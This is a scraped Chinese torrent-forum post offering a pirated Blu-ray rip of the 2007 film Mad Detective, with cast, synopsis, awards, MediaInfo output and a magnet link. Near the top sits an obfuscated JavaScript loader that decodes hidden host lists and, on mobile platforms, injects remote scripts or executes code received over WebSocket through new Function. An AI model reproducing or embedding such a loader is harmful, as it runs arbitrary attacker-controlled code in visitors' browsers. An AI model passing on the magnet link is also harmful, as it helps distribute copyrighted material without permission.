神探[国粤语配音/中文字幕].Mad.Detective.2007.1080p.BluRay.x265.10bit.DTS.2Audio 6.36GB

版主小s 24天前 153

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 神探 / Mad Detective

◎年 代 2007

◎产 地 中国香港

◎类 别 动作 / 悬疑 / 惊悚 / 犯罪

◎语 言 粤语 / 英语

◎上映日期 2008-02-22(中国大陆) / 2007-11-29(中国香港) / 2007-09-06(威尼斯电影节)

◎IMDb链接 https://www.imdb.com/title/tt0969269/

◎豆瓣评分 8.5/10 (224325人评价)

◎豆瓣链接 https://movie.douban.com/subject/2027938/

◎片 长 90分钟

◎导 演 杜琪峰 Johnnie To (id:1160186)

韦家辉 Ka-Fai Wai (id:1017843)

◎编 剧 韦家辉 Ka-Fai Wai (id:1017843)

欧健儿 Kin-Yee Au (id:1303521)

◎演 员 刘青云 Sean Lau (id:1007251)

安志杰 Andy On (id:1045364)

林家栋 Ka Tung Lam (id:1050329)

林熙蕾 Kelly Lin (id:1041368)

李国麟 Kwok-Lun Lee (id:1274575)

李彩宁 Choi-ning Lee (id:1231644)

陈慧珊 Flora Chan (id:1020025)

林雪 Suet Lam (id:1274279)

张兆辉 Siu-Fai Cheung (id:1005843)

刘锦玲 Jay Lau (id:1111255)

郭少芸 Florence Kwok (id:1313756)

郑保瑞 Pou-Soi Cheang (id:1274240)

赵志诚 Chiu Chi Shing (id:1326360)

王璐瑶 Louise Wong (id:1411146)

张家杰 Jeff Cheung (id:1391313)

辛格·哈提汗·比托 Singh Hartihan Bitto (id:1333958)

李日升 Jonathan Yat-Sing Lee (id:1364272)

谷祖琳 Jolane Koo (id:1045825)

高雄 Eddy Ko (id:1313798)

杜琪峰 Johnnie To (id:1160186)

鞠觉亮 Kok Leung Kuk (id:1315703)

丁云山 Wan San Ding (id:1388181)

泽维尔·让诺 Xavier Jamaux (id:1021607)

郑兆强 Siu-keung Cheng (id:1280597)

张家杰 Jeff Cheung (id:1391313)

黄华和 Wah Wo Wong (id:1355706)

甄懋强 Ronald Yan (id:1364264)

◎标 签 杜琪峰 / 刘青云 / 犯罪 / 悬疑 / 香港 / 香港电影 / 银河映像 / 韦家辉

◎简 介

天才和疯子常常只是同一个人的两种描述。神探陈桂彬(刘青云 饰)就是这样一个人物,和天才画家梵高一样,他也曾经割下自己的耳朵。尽管破案无数,侦探能力超凡,却终被世俗认定是疯子一个,提早从警局里退了休。

探员何家安(安志杰 饰)接到了一桩棘手的案件。案发地在树林,两名警员王 国柱(李国麟 饰)和高志伟(林家栋 饰)办案之后,只有高志伟平安归来,而王国柱和他的枪则神秘失踪。何家安请来陈桂彬为他指点迷津,却未料到陈桂彬的“疯子”行为又一次在侦探过程中表露无遗。他断定高志伟就是此案凶手,并把推理建立在他自己大量的想象之上。他自称能看到高志伟的“七宗罪”,正是这些罪恶把高志伟引向犯罪之路。然而,要何家安相信这一切并不容易,因为他已经被高志伟的演技所迷惑……

◎获奖情况 (共11项)

第64届威尼斯电影节 (2007)

金狮奖(提名)

第27届香港电影金像奖 (2008)

最佳电影(提名)

最佳导演(提名)

最佳编剧

最佳男主角(提名)

└──刘青云 (id:1007251)

最佳摄影(提名)

└──郑兆强 (id:1280597)

最佳剪接(提名)

└──蒂娜·巴兹 (id:1278132)

最佳服装造型设计(提名)

└──张世杰 (id:1280624)

最佳视觉效果(提名)

└──文少麟 (id:1312054)

第2届亚洲电影大奖 (2008)

最佳编剧

第8届华语电影传媒大奖 (2008)

最佳编剧

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 209638902226772658065828261809497155960 (0x9DB6FBE2E1E615B1D63CD6A5C3BDA978)

  4. Complete name : [email protected]DQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.36 GiB

  8. Duration : 1 h 30 min

  9. Overall bit rate : 10.1 Mb/s

  10. Movie name : Mad Detective 2007

  11. Encoded date : UTC 2021-09-26 01:45:56

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 30 min

  21. Bit rate : 7 910 kb/s

  22. Width : 1 920 pixels

  23. Height : 820 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.209

  31. Stream size : 4.99 GiB (78%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=1 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x820 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. ID in the original source medium : 4353 (0x1101)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 30 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossy

  51. Stream size : 975 MiB (15%)

  52. Title : Cantonese

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Audio #2

  58. ID : 3

  59. ID in the original source medium : 4355 (0x1103)

  60. Format : AC-3

  61. Format/Info : Audio Coding 3

  62. Commercial name : Dolby Digital

  63. Codec ID : A_AC3

  64. Duration : 1 h 30 min

  65. Bit rate mode : Constant

  66. Bit rate : 640 kb/s

  67. Channel(s) : 6 channels

  68. Channel layout : L R C LFE Ls Rs

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 31.250 FPS (1536 SPF)

  71. Compression mode : Lossy

  72. Stream size : 414 MiB (6%)

  73. Title : Mandarin

  74. Language : Chinese

  75. Service kind : Complete Main

  76. Default : Yes

  77. Forced : No

  78. Original source medium : Blu-ray


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 23 min

  87. Bit rate : 26.3 kb/s

  88. Count of elements : 1033

  89. Stream size : 15.7 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : No

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 23 min

  103. Bit rate : 28.6 kb/s

  104. Count of elements : 1033

  105. Stream size : 17.0 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 23 min

  119. Bit rate : 26.7 kb/s

  120. Count of elements : 1051

  121. Stream size : 15.9 MiB (0%)

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : Chapter 01

  128. 00:04:22.000 : Chapter 02

  129. 00:08:39.250 : Chapter 03

  130. 00:15:04.000 : Chapter 04

  131. 00:18:30.875 : Chapter 05

  132. 00:20:36.916 : Chapter 06

  133. 00:26:53.208 : Chapter 07

  134. 00:31:31.208 : Chapter 08

  135. 00:36:21.125 : Chapter 09

  136. 00:40:51.916 : Chapter 10

  137. 00:44:41.541 : Chapter 11

  138. 00:47:23.666 : Chapter 12

  139. 00:50:13.166 : Chapter 13

  140. 00:53:01.625 : Chapter 14

  141. 00:54:01.250 : Chapter 15

  142. 00:55:22.416 : Chapter 16

  143. 00:58:57.291 : Chapter 17

  144. 01:03:26.333 : Chapter 18

  145. 01:07:52.125 : Chapter 19

  146. 01:10:25.000 : Chapter 20

  147. 01:14:01.375 : Chapter 21

  148. 01:15:40.458 : Chapter 22


TAGS 动作 惊悚 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:4871D0E8234F667872E757E557C684262A11FD71
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回